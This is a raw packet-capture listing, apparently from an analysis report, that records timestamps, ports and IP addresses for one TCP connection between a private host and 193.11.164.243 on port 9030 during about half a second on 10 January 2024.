Jan 10, 2024 15:39:00.795176029 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.795243979 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.795285940 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.798846006 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.798898935 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.798924923 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.798938036 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.798953056 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.798976898 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.798978090 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.798990965 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.799025059 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.799057007 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.799073935 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.799082041 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.799118996 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.799150944 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.799164057 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.799186945 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.799195051 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.799230099 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.799232960 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.799268007 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.799268961 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.799316883 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.799765110 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.799801111 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.799844027 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.799850941 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.799874067 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.799876928 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.799890995 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.799926043 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.001862049 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.001898050 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.001913071 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.001934052 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.001967907 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.002022982 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.002073050 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.002104998 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.002149105 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.002178907 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.002218008 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.002278090 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.002331018 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.002352953 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.002394915 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.002469063 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.002522945 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.002557993 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.002612114 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.002645016 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.002701044 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.002733946 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.002795935 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.002830029 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.002882004 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.002888918 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.002933979 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.002985954 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.003040075 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.003067970 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.003109932 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.003139019 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.003160000 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.003190041 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.003238916 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.003272057 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.003313065 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.003356934 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.003413916 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.003424883 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.003458023 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.003479004 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.003540039 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.003541946 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.003587961 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.003597975 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.003649950 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.030709982 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.030735016 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.030747890 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.030769110 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.030793905 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.030795097 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.030846119 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.030853987 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.030891895 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.030910015 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.030955076 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.042732000 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.042799950 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.042855978 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.042875051 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.042886972 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.042907953 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.042932034 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.042964935 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.043009043 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.043041945 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.043097973 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.046003103 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.046066046 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.046113014 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.046156883 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.046158075 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.046205044 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.046220064 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.046268940 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.046272039 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.046319008 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.046322107 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.046365023 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.051803112 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.051821947 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.051861048 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.051886082 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.051976919 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.052011967 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.052033901 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.052069902 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.052071095 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.052110910 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.052180052 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.052237034 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.053603888 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.053621054 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.053661108 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.053672075 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.053679943 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.053716898 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.053733110 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.053775072 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.053797007 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.053847075 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.053857088 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.053915024 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.054166079 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.054224014 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.054241896 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.054290056 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.054303885 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.054362059 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.054367065 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.054419994 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.054431915 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.054486990 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.054495096 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.054537058 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.054546118 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.054577112 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.056859970 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.056895971 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.056919098 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.056941032 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.057080030 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.057126045 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.057132006 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.057178974 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.057190895 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.057248116 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.057255983 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.057303905 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.208044052 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.208070993 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.208086967 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.208116055 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.208117008 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.208157063 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.208185911 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.208452940 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.208501101 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.208513021 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.208561897 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.208617926 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.208659887 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.208677053 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.208717108 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.208776951 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.208830118 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.208834887 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.208878994 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.208893061 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.208935976 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.208961964 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.209008932 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.209018946 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.209064960 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.209084034 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.209127903 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.209146023 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.209172964 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.209198952 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.209243059 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.209345102 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.209388018 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.209418058 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.209472895 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.209486008 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.209533930 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.209542036 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.209583998 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.209587097 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.209623098 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.209650040 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.209692001 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.209742069 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.209817886 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.209846020 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.209871054 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.209875107 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.209923983 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.209935904 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.209978104 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.210052967 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.210103035 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.210146904 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.210192919 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.210206985 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.210259914 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.210374117 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.210429907 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.210486889 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.210534096 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.210551023 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.210598946 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.210627079 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.210676908 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.210717916 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.210764885 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.210815907 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.210850954 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.210864067 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.210892916 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.211002111 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.211047888 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.211076975 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.211126089 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.211137056 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.211179018 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.211183071 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.211230993 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.211308956 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.211357117 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.211384058 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.211433887 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.211479902 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.211528063 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.211555004 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.211600065 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.211602926 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.211647034 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.211661100 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.211704969 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.211705923 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.211750031 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.211756945 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.211802959 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.211864948 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.211911917 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.211977005 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.212027073 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.212073088 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.212124109 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.212151051 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.212199926 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.212274075 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.212330103 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.212348938 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.212392092 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.212407112 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.212450027 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.212487936 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.212531090 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.212546110 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.212584972 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.212614059 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.212662935 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.212728977 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.212778091 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.212805986 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.212857008 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.236680031 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.236715078 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.236728907 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.236742973 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.236776114 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.236783981 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.236794949 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.236824989 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.236905098 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.236952066 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.236994028 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.237037897 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.237044096 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.237083912 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.237114906 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.237165928 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.237371922 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.237415075 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.237788916 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.237832069 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.238045931 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.238116026 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.238274097 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.238322973 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.248826981 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.248907089 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.248939037 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.248991013 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.249074936 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.249119043 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.249133110 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.249164104 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.249214888 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.249263048 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.249305010 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.249347925 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.249438047 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.249481916 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.249511957 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.249552011 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.249598980 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.249644041 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.249730110 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.249775887 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.249815941 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.249871969 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.249917984 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.249969959 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.251982927 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.252038002 CET	49726	9030	192.168.2.6	193.11.164.243
